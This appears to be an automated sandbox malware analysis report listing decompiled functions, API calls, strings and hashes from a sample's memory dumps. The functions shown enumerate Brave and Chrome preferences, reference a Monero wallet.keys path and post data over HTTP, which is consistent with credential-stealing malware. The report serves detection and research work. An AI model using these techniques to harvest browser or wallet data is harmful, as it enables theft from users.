Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: a8632c72287aa06a86cf23377a60eec1dce716b2093f76b9c3348ec54fa90702
Instruction ID: 0980ea8ad3a16c80a65ccc6a8327482f3a3ecb070e0abfa151afcd480a9c68a3
Opcode Fuzzy Hash: a8632c72287aa06a86cf23377a60eec1dce716b2093f76b9c3348ec54fa90702
Instruction Fuzzy Hash: D2A14EF9514240AFD354EFE8ED889A637FBF74C301754672AE605C3664DA3A98C1CB12

Function 004745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0047460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0047479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004746B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00474713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0047474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004745D2

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 0595973d8dbf0f901c5ec8080fbaa8574c782555a0d5f685b7c80b765537be7e
Instruction ID: 967a3e1778c24db62e6c22776257eea322098b9572a67b823a0958818d3adc53
Opcode Fuzzy Hash: 0595973d8dbf0f901c5ec8080fbaa8574c782555a0d5f685b7c80b765537be7e
Instruction Fuzzy Hash: 1F41D7606CB609EEEE65B7E48D42FDD7A75EF42F08FB0535AF80452280CF696603C619

Function 0047BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

FindFirstFileA.KERNEL32(00000000,?,00490B32,00490B2B,00000000,?,?,?,004913F4,00490B2A), ref: 0047BEF5
StrCmpCA.SHLWAPI(?,004913F8), ref: 0047BF4D
StrCmpCA.SHLWAPI(?,004913FC), ref: 0047BF63
FindNextFileA.KERNEL32(000000FF,?), ref: 0047C7BF
FindClose.KERNEL32(000000FF), ref: 0047C7D1

Strings

\Brave\Preferences, xrefs: 0047C1DB
Preferences, xrefs: 0047C11E
Google Chrome, xrefs: 0047C634
Brave, xrefs: 0047C102

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 801e049d83c42870559e162bb668e7f31da825d1f410cc242d3f260a1fc50ed4
Instruction ID: 642f45e235a3cea499554499a0034f459c3c041ffa36d000783fb0c0b17accd9
Opcode Fuzzy Hash: 801e049d83c42870559e162bb668e7f31da825d1f410cc242d3f260a1fc50ed4
Instruction Fuzzy Hash: E24285729001046BDB14FB61DC96EED733DAB44304F40896FF50A92191EE7CAB59CBAA

Function 6C5E35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C66F688,00001000), ref: 6C5E35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5E35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C5E35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5E363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5E369F
__aulldiv.LIBCMT ref: 6C5E36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C5E3773
EnterCriticalSection.KERNEL32(6C66F688), ref: 6C5E377E
LeaveCriticalSection.KERNEL32(6C66F688), ref: 6C5E37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C5E37C4
EnterCriticalSection.KERNEL32(6C66F688), ref: 6C5E37CB
LeaveCriticalSection.KERNEL32(6C66F688), ref: 6C5E3801
__aulldiv.LIBCMT ref: 6C5E3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C5E3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C5E3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C5E394C

Strings

AuthcAMDenti, xrefs: 6C5E3946
MOZ_TIMESTAMP_MODE, xrefs: 6C5E35DB
GenuntelineI, xrefs: 6C5E3639
GTC, xrefs: 6C5E3912
QPC, xrefs: 6C5E38FC

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: f6ea377745689782e37a17b5e0f37151db492b221e952ce886a6331b41e11010
Instruction ID: bbd23bd2f134a53b70ba3f6f23ae63f9f4dd9612ab2377435f7faaa9a4eb83c8
Opcode Fuzzy Hash: f6ea377745689782e37a17b5e0f37151db492b221e952ce886a6331b41e11010
Instruction Fuzzy Hash: 2BB1A471B093109BDB08DF2BC89462A7BF6BB8E700F15892DE499D7760D7709901CB9B

Function 00484910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0048492C
FindFirstFileA.KERNEL32(?,?), ref: 00484943
StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
FindClose.KERNEL32(000000FF), ref: 00484B92

Strings

%s\*, xrefs: 00484920
%s\%s, xrefs: 004849FB
%s\%s, xrefs: 004849A4

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: addf175e36787d3465888c4c306a55bcc14215424a1643c1ca3e928f496bae27
Instruction ID: b4a1857187b49745dde974c516fbce93845badbe02a8502d06a27e44099a2b5f
Opcode Fuzzy Hash: addf175e36787d3465888c4c306a55bcc14215424a1643c1ca3e928f496bae27
Instruction Fuzzy Hash: 486154F2900219ABCB24EBE0DC45FEE777DBB48700F00869DE50996141EB79AB85CF95

Function 00474880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00474915
StrCmpCA.SHLWAPI(?,0110E8F8), ref: 0047493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00474ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00490DDB,00000000,?,?,00000000,?,",00000000,?,0110E748), ref: 00474DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00474E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00474E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00474E49
InternetCloseHandle.WININET(00000000), ref: 00474EAD
InternetCloseHandle.WININET(00000000), ref: 00474EC5
HttpOpenRequestA.WININET(00000000,0110E8E8,?,0110E278,00000000,00000000,00400100,00000000), ref: 00474B15

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

InternetCloseHandle.WININET(00000000), ref: 00474ECF

Strings

------, xrefs: 004749BD
------, xrefs: 00474C69
", xrefs: 00474D33
", xrefs: 00474BF2
------, xrefs: 00474B28

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
